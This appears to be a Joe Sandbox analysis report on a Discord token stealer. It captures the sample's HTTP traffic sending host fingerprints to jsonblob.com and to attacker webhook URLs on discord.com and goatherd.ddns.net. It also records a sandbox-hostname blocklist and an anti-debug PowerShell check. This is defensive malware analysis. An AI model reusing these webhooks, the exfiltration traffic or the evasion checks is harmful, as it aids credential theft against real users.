2024-11-04 15:24:47 UTC	1378	IN	Data Raw: 30 30 39 30 30 42 43 38 33 38 30 32 0a 30 30 39 30 30 42 43 38 33 38 30 33 0a 30 43 43 34 37 41 43 38 33 38 30 33 0a 31 38 43 39 41 43 44 46 2d 37 43 30 30 2d 34 0a 33 43 45 43 45 46 43 38 33 38 30 36 0a 36 43 34 45 37 33 33 46 2d 43 32 44 39 2d 34 0a 41 42 49 47 41 49 0a 41 43 45 50 43 0a 41 49 44 41 4e 50 43 0a 41 4c 45 4e 4d 4f 4f 53 2d 50 43 0a 41 4c 49 4f 4e 45 0a 41 50 50 4f 4e 46 4c 59 2d 56 50 53 0a 41 52 43 48 49 42 41 4c 44 50 43 0a 61 7a 75 72 65 0a 42 33 30 46 30 32 34 32 2d 31 43 36 41 2d 34 0a 42 41 52 4f 53 49 4e 4f 2d 50 43 0a 42 45 43 4b 45 52 2d 50 43 0a 42 45 45 37 33 37 30 43 2d 38 43 30 43 2d 34 0a 43 38 31 46 36 36 43 38 33 38 30 35 0a 43 41 54 57 52 49 47 48 54 0a 43 48 53 48 41 57 0a 43 4f 46 46 45 45 2d 53 48 4f 50 0a 43 4f 4d 50 Data Ascii: 00900BC8380200900BC838030CC47AC8380318C9ACDF-7C00-43CECEFC838066C4E733F-C2D9-4ABIGAIACEPCAIDANPCALENMOOS-PCALIONEAPPONFLY-VPSARCHIBALDPCazureB30F0242-1C6A-4BAROSINO-PCBECKER-PCBEE7370C-8C0C-4C81F66C83805CATWRIGHTCHSHAWCOFFEE-SHOPCOMP
2024-11-04 15:24:47 UTC	1378	IN	Data Raw: 46 4f 0a 44 45 53 4b 54 4f 50 2d 4c 54 4d 43 4b 4c 41 0a 44 45 53 4b 54 4f 50 2d 4d 4a 43 36 35 30 30 0a 44 45 53 4b 54 4f 50 2d 4d 57 46 52 56 4b 48 0a 44 45 53 4b 54 4f 50 2d 4e 41 4b 46 46 4d 54 0a 44 45 53 4b 54 4f 50 2d 4e 4b 50 30 49 34 50 0a 44 45 53 4b 54 4f 50 2d 4e 4d 31 5a 50 4c 47 0a 44 45 53 4b 54 4f 50 2d 4e 54 55 37 56 55 4f 0a 44 45 53 4b 54 4f 50 2d 4f 36 46 42 4d 46 37 0a 44 45 53 4b 54 4f 50 2d 4f 37 42 49 33 50 54 0a 44 45 53 4b 54 4f 50 2d 50 41 30 46 4e 56 35 0a 44 45 53 4b 54 4f 50 2d 50 4b 51 4e 44 53 52 0a 44 45 53 4b 54 4f 50 2d 51 4c 4e 32 56 55 46 0a 44 45 53 4b 54 4f 50 2d 51 55 41 59 38 47 53 0a 44 45 53 4b 54 4f 50 2d 52 43 41 33 51 57 58 0a 44 45 53 4b 54 4f 50 2d 52 48 58 44 4b 57 57 0a 44 45 53 4b 54 4f 50 2d 52 50 34 46 Data Ascii: FODESKTOP-LTMCKLADESKTOP-MJC6500DESKTOP-MWFRVKHDESKTOP-NAKFFMTDESKTOP-NKP0I4PDESKTOP-NM1ZPLGDESKTOP-NTU7VUODESKTOP-O6FBMF7DESKTOP-O7BI3PTDESKTOP-PA0FNV5DESKTOP-PKQNDSRDESKTOP-QLN2VUFDESKTOP-QUAY8GSDESKTOP-RCA3QWXDESKTOP-RHXDKWWDESKTOP-RP4F
2024-11-04 15:24:47 UTC	389	IN	Data Raw: 45 45 4c 35 33 53 4e 0a 57 49 4e 5a 44 53 2d 31 42 48 52 56 50 51 55 0a 57 49 4e 5a 44 53 2d 32 32 55 52 4a 49 42 56 0a 57 49 4e 5a 44 53 2d 33 46 46 32 49 39 53 4e 0a 57 49 4e 5a 44 53 2d 35 4a 37 35 44 54 48 48 0a 57 49 4e 5a 44 53 2d 36 54 55 49 48 4e 37 52 0a 57 49 4e 5a 44 53 2d 38 4d 41 45 49 38 45 34 0a 57 49 4e 5a 44 53 2d 39 49 4f 37 35 53 56 47 0a 57 49 4e 5a 44 53 2d 41 4d 37 36 48 50 4b 32 0a 57 49 4e 5a 44 53 2d 42 30 33 4c 39 43 45 4f 0a 57 49 4e 5a 44 53 2d 42 4d 53 4d 44 38 4d 45 0a 57 49 4e 5a 44 53 2d 42 55 41 4f 4b 47 47 31 0a 57 49 4e 5a 44 53 2d 4b 37 56 49 4b 34 46 43 0a 57 49 4e 5a 44 53 2d 4d 49 4c 4f 42 4d 33 35 0a 57 49 4e 5a 44 53 2d 50 55 30 55 52 50 56 49 0a 57 49 4e 5a 44 53 2d 51 4e 47 4b 47 4e 35 39 0a 57 49 4e 5a 44 53 2d Data Ascii: EEL53SNWINZDS-1BHRVPQUWINZDS-22URJIBVWINZDS-3FF2I9SNWINZDS-5J75DTHHWINZDS-6TUIHN7RWINZDS-8MAEI8E4WINZDS-9IO75SVGWINZDS-AM76HPK2WINZDS-B03L9CEOWINZDS-BMSMD8MEWINZDS-BUAOKGG1WINZDS-K7VIK4FCWINZDS-MILOBM35WINZDS-PU0URPVIWINZDS-QNGKGN59WINZDS-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49708	188.114.97.3	443	5460	C:\Users\user\Desktop\CFuejz2dRu.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-04 15:24:48 UTC	186	OUT	POST /api/jsonBlob HTTP/1.1 Host: jsonblob.com User-Agent: Go-http-client/1.1 Content-Length: 4135 Accept: application/json Content-Type: application/json Accept-Encoding: gzip
2024-11-04 15:24:48 UTC	1000	OUT	Data Raw: 7b 22 63 70 75 22 3a 5b 7b 22 63 70 75 22 3a 30 2c 22 76 65 6e 64 6f 72 49 64 22 3a 22 47 65 6e 75 69 6e 65 49 6e 74 65 6c 22 2c 22 66 61 6d 69 6c 79 22 3a 22 32 22 2c 22 6d 6f 64 65 6c 22 3a 22 22 2c 22 73 74 65 70 70 69 6e 67 22 3a 30 2c 22 70 68 79 73 69 63 61 6c 49 64 22 3a 22 43 45 39 38 41 36 39 30 35 31 22 2c 22 63 6f 72 65 49 64 22 3a 22 22 2c 22 63 6f 72 65 73 22 3a 31 2c 22 6d 6f 64 65 6c 4e 61 6d 65 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 6d 68 7a 22 3a 32 30 30 30 2c 22 63 61 63 68 65 53 69 7a 65 22 3a 30 2c 22 66 6c 61 67 73 22 3a 5b 5d 2c 22 6d 69 63 72 6f 63 6f 64 65 22 3a 22 22 7d 2c 7b 22 63 70 75 22 3a 31 2c 22 76 65 6e 64 6f 72 49 64 22 3a 22 47 Data Ascii: {"cpu":[{"cpu":0,"vendorId":"GenuineIntel","family":"2","model":"","stepping":0,"physicalId":"CE98A69051","coreId":"","cores":1,"modelName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","mhz":2000,"cacheSize":0,"flags":[],"microcode":""},{"cpu":1,"vendorId":"G
2024-11-04 15:24:48 UTC	2372	OUT	Data Raw: 6e 76 22 3a 7b 22 22 3a 22 3a 3a 3d 3a 3a 5c 5c 22 2c 22 41 4c 4c 55 53 45 52 53 50 52 4f 46 49 4c 45 22 3a 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 44 61 74 61 22 2c 22 41 50 50 44 41 54 41 22 3a 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 68 75 62 65 72 74 5c 5c 41 70 70 44 61 74 61 5c 5c 52 6f 61 6d 69 6e 67 22 2c 22 43 4f 4d 50 55 54 45 52 4e 41 4d 45 22 3a 22 48 55 42 45 52 54 2d 50 43 22 2c 22 43 6f 6d 53 70 65 63 22 3a 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 63 6d 64 2e 65 78 65 22 2c 22 43 6f 6d 6d 6f 6e 50 72 6f 67 72 61 6d 46 69 6c 65 73 22 3a 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 43 6f 6d 6d 6f 6e 20 46 69 6c 65 73 22 2c 22 43 6f 6d 6d 6f 6e 50 72 6f 67 72 61 6d 46 69 6c 65 73 28 78 38 36 29 22 3a 22 43 Data Ascii: nv":{"":"::=::\\","ALLUSERSPROFILE":"C:\\ProgramData","APPDATA":"C:\\Users\\user\\AppData\\Roaming","COMPUTERNAME":"user-PC","ComSpec":"C:\\Windows\\system32\\cmd.exe","CommonProgramFiles":"C:\\Program Files\\Common Files","CommonProgramFiles(x86)":"C
2024-11-04 15:24:48 UTC	538	OUT	Data Raw: 6c 61 69 6d 61 62 6c 65 22 3a 30 2c 22 73 75 6e 72 65 63 6c 61 69 6d 22 3a 30 2c 22 70 61 67 65 74 61 62 6c 65 73 22 3a 30 2c 22 73 77 61 70 63 61 63 68 65 64 22 3a 30 2c 22 63 6f 6d 6d 69 74 6c 69 6d 69 74 22 3a 30 2c 22 63 6f 6d 6d 69 74 74 65 64 61 73 22 3a 30 2c 22 68 69 67 68 74 6f 74 61 6c 22 3a 30 2c 22 68 69 67 68 66 72 65 65 22 3a 30 2c 22 6c 6f 77 74 6f 74 61 6c 22 3a 30 2c 22 6c 6f 77 66 72 65 65 22 3a 30 2c 22 73 77 61 70 74 6f 74 61 6c 22 3a 30 2c 22 73 77 61 70 66 72 65 65 22 3a 30 2c 22 6d 61 70 70 65 64 22 3a 30 2c 22 76 6d 61 6c 6c 6f 63 74 6f 74 61 6c 22 3a 30 2c 22 76 6d 61 6c 6c 6f 63 75 73 65 64 22 3a 30 2c 22 76 6d 61 6c 6c 6f 63 63 68 75 6e 6b 22 3a 30 2c 22 68 75 67 65 70 61 67 65 73 74 6f 74 61 6c 22 3a 30 2c 22 68 75 67 65 70 61 Data Ascii: laimable":0,"sunreclaim":0,"pagetables":0,"swapcached":0,"commitlimit":0,"committedas":0,"hightotal":0,"highfree":0,"lowtotal":0,"lowfree":0,"swaptotal":0,"swapfree":0,"mapped":0,"vmalloctotal":0,"vmallocused":0,"vmallocchunk":0,"hugepagestotal":0,"hugepa
2024-11-04 15:24:48 UTC	225	OUT	Data Raw: 74 65 72 66 61 63 65 20 31 22 2c 22 68 61 72 64 77 61 72 65 61 64 64 72 22 3a 22 22 2c 22 66 6c 61 67 73 22 3a 5b 22 75 70 22 2c 22 6c 6f 6f 70 62 61 63 6b 22 2c 22 6d 75 6c 74 69 63 61 73 74 22 5d 2c 22 61 64 64 72 73 22 3a 5b 7b 22 61 64 64 72 22 3a 22 3a 3a 31 2f 31 32 38 22 7d 2c 7b 22 61 64 64 72 22 3a 22 31 32 37 2e 30 2e 30 2e 31 2f 38 22 7d 5d 7d 5d 2c 22 70 75 62 6c 69 63 5f 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 75 69 64 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 77 69 6e 2e 61 74 74 61 63 68 65 64 5f 64 65 62 75 67 67 65 72 22 3a 66 61 6c 73 65 7d Data Ascii: terface 1","hardwareaddr":"","flags":["up","loopback","multicast"],"addrs":[{"addr":"::1/128"},{"addr":"127.0.0.1/8"}]}],"public_ip":"173.254.250.69","uid":"9e146be9-c76a-4720-bcdb-53011b87bd06","win.attached_debugger":false}
2024-11-04 15:24:48 UTC	178	IN	HTTP/1.1 403 Forbidden Server: cloudflare Date: Mon, 04 Nov 2024 15:24:48 GMT Content-Type: text/html Content-Length: 151 Connection: close CF-RAY: 8dd59cf1cf69e82f-DFW
2024-11-04 15:24:48 UTC	151	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49709	188.114.97.3	443	5460	C:\Users\user\Desktop\CFuejz2dRu.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-04 15:24:49 UTC	184	OUT	POST /api/jsonBlob HTTP/1.1 Host: jsonblob.com User-Agent: Go-http-client/1.1 Content-Length: 28 Accept: application/json Content-Type: application/json Accept-Encoding: gzip
2024-11-04 15:24:49 UTC	28	OUT	Data Raw: 7b 22 45 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 54 6f 6b 65 6e 73 22 3a 6e 75 6c 6c 7d Data Ascii: {"Error":null,"Tokens":null}
2024-11-04 15:24:49 UTC	178	IN	HTTP/1.1 403 Forbidden Server: cloudflare Date: Mon, 04 Nov 2024 15:24:49 GMT Content-Type: text/html Content-Length: 151 Connection: close CF-RAY: 8dd59cf82b112c9c-DFW
2024-11-04 15:24:49 UTC	151	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49710	162.159.137.232	443	5460	C:\Users\user\Desktop\CFuejz2dRu.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-04 15:24:50 UTC	247	OUT	POST /api/webhooks/1300019313184608266/FeQlgT1nouUBj-HNeYycjpr9Nw2LI_OPHxx-u8ZXx5mMbMn1xnI5pbwKHfVTgTRkzJCv HTTP/1.1 Host: discord.com User-Agent: Go-http-client/1.1 Content-Length: 321 Content-Type: application/json Accept-Encoding: gzip
2024-11-04 15:24:50 UTC	321	OUT	Data Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 20 7c 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 56 6d 20 73 74 61 74 75 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 49 73 20 69 6e 20 76 6d 3a 20 4e 6f 22 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 54 72 69 67 67 65 72 22 2c 22 76 61 6c 75 65 22 3a 22 5c 22 5c 22 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 41 64 64 69 74 69 6f 6e 61 6c 73 20 49 6e 66 6f 73 22 2c 22 76 61 6c 75 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 73 6f 6e 62 6c 6f 62 2e 63 6f 6d 2f 22 7d 5d 7d 2c 7b 22 74 69 74 6c 65 22 3a 22 44 69 73 63 6f 72 64 20 49 6e Data Ascii: {"username":"9e146be9-c76a-4720-bcdb-53011b87bd06 \| 173.254.250.69","embeds":[{"title":"Vm status","description":"Is in vm: No","fields":[{"name":"Trigger","value":"\"\""},{"name":"Additionals Infos","value":"https://jsonblob.com/"}]},{"title":"Discord In
2024-11-04 15:24:50 UTC	1360	IN	HTTP/1.1 204 No Content Date: Mon, 04 Nov 2024 15:24:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: __dcfduid=eeedcc6e9ac011efbab27a7dbe66a149; Expires=Sat, 03-Nov-2029 15:24:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1730733891 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pTJa7UAOr2I0%2B0Sx7fRgKsc3EZc8Xeyq%2Fnb9Uc%2BOcGX%2FAYeC7tM5V3bQtjL7Y1dUkyLtMlaZwQpmhIz%2F5J1GyUjZxtjqoTtkLCzM89nMIHSeDs%2FPSULBzyw8FMUB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=eeedcc6e9ac011efbab27a7dbe66a1492788cb31a1b3e6c8288a355d4870adadabf6f035b7fae7573c4a0210972302e6; Expires=Sat, 03-Nov-2029 15:24:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=1860d9b6c0b4e0f545fc341099a3e72583778ef9-1730733890; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-11-04 15:24:50 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 77 76 39 4c 4f 63 37 6c 4d 4b 6d 5f 71 55 62 38 45 34 30 61 62 6e 58 41 51 36 6d 70 59 59 4a 55 31 6d 30 31 58 57 79 36 37 4f 34 2d 31 37 33 30 37 33 33 38 39 30 34 39 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 64 35 39 63 66 65 33 62 31 31 36 63 30 34 2d 44 46 57 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=wv9LOc7lMKm_qUb8E40abnXAQ6mpYYJU1m01XWy67O4-1730733890493-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8dd59cfe3b116c04-DFW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	62043	86.237.153.121	443	5460	C:\Users\user\Desktop\CFuejz2dRu.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-04 15:24:52 UTC	248	OUT	POST /webhook/1218887559619412029/Eva2oRkKwFen8y0e2duZ2zkjwo66NO-HdAdY99U_FseLCs0vvbTTUpzvmBAHiUakxGb3 HTTP/1.1 Host: goatherd.ddns.net User-Agent: Go-http-client/1.1 Content-Length: 321 Content-Type: application/json Accept-Encoding: gzip
2024-11-04 15:24:52 UTC	321	OUT	Data Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 20 7c 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 56 6d 20 73 74 61 74 75 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 49 73 20 69 6e 20 76 6d 3a 20 4e 6f 22 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 54 72 69 67 67 65 72 22 2c 22 76 61 6c 75 65 22 3a 22 5c 22 5c 22 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 41 64 64 69 74 69 6f 6e 61 6c 73 20 49 6e 66 6f 73 22 2c 22 76 61 6c 75 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 73 6f 6e 62 6c 6f 62 2e 63 6f 6d 2f 22 7d 5d 7d 2c 7b 22 74 69 74 6c 65 22 3a 22 44 69 73 63 6f 72 64 20 49 6e Data Ascii: {"username":"9e146be9-c76a-4720-bcdb-53011b87bd06 \| 173.254.250.69","embeds":[{"title":"Vm status","description":"Is in vm: No","fields":[{"name":"Trigger","value":"\"\""},{"name":"Additionals Infos","value":"https://jsonblob.com/"}]},{"title":"Discord In
2024-11-04 15:24:52 UTC	1562	IN	HTTP/1.1 204 No Content Server: nginx Date: Mon, 04 Nov 2024 13:46:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: __dcfduid=f044a15a9ac011ef93c4d6d1ab5c9d43; Expires=Sat, 03-Nov-2029 15:24:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1730733894 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pSszPAGeSgSz5gBRV%2BSL8JYKgSN3qx%2FXsF72VyF9jmtsrm2RtSn87Vc3Vc%2BUYtGGOPmQZoUngmR844JIz9RzCkNDQWGwOYtZvNu0NQooMcl%2BFmr9NQdzvcmIVhIm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=f044a15a9ac011ef93c4d6d1ab5c9d43eff1943b6de2a13aabe86cc79d2b254ec652758d80c24cbb0eb3f034883a4bb0; Expires=Sat, 03-Nov-2029 15:24:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=d7be4b994b29ddca6dcf910373192862666e291f-1730733892; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Set-Cookie: _cfuvid=i.xw5DAmSTzWBXGgNeTc5Kdm3Ubwc8yumeiIF3Uk7X0-1730733892773-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None CF-RAY: 8dd59d0c4955d161-CDG

Target ID:	0
Start time:	10:24:40
Start date:	04/11/2024
Path:	C:\Users\user\Desktop\CFuejz2dRu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\CFuejz2dRu.exe"
Imagebase:	0xbc0000
File size:	6'226'432 bytes
MD5 hash:	020B08DA71B11949586B7A6185877B13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000000.00000002.1591335139.000000C000016000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:24:40
Start date:	04/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:24:42
Start date:	04/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command [Diagnostics.Debugger]::IsAttached
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00C34B00 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590358089.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1590339414.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590565021.0000000000E82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590771855.0000000001147000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590790518.0000000001149000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590806306.000000000114A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590821655.000000000114D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590837964.000000000114E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590854252.000000000114F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590879799.0000000001179000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590896469.000000000117A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590911640.000000000117C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590928918.000000000118A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590947174.000000000118E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590963228.000000000118F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590979501.0000000001191000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590979501.00000000011AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590979501.00000000011B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590979501.00000000011DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591053345.00000000011E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591073711.00000000011F3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591088802.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_CFuejz2dRu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
Instruction ID: d354358b46491c190e786361f24cd537a364e799d4ca3894af0b6ddce542556d
Opcode Fuzzy Hash: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
Instruction Fuzzy Hash: BD31782791CFC482D3218B24F5417AAB364F7A9794F15A715EFC812A1ADF38E2E5CB40

Function 00C30E60 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590358089.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1590339414.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590565021.0000000000E82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590771855.0000000001147000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590790518.0000000001149000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590806306.000000000114A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590821655.000000000114D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590837964.000000000114E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590854252.000000000114F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590879799.0000000001179000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590896469.000000000117A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590911640.000000000117C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590928918.000000000118A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590947174.000000000118E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590963228.000000000118F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590979501.0000000001191000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590979501.00000000011AD000.00000004.00000001.01000000.00000003.sdmpDownload File
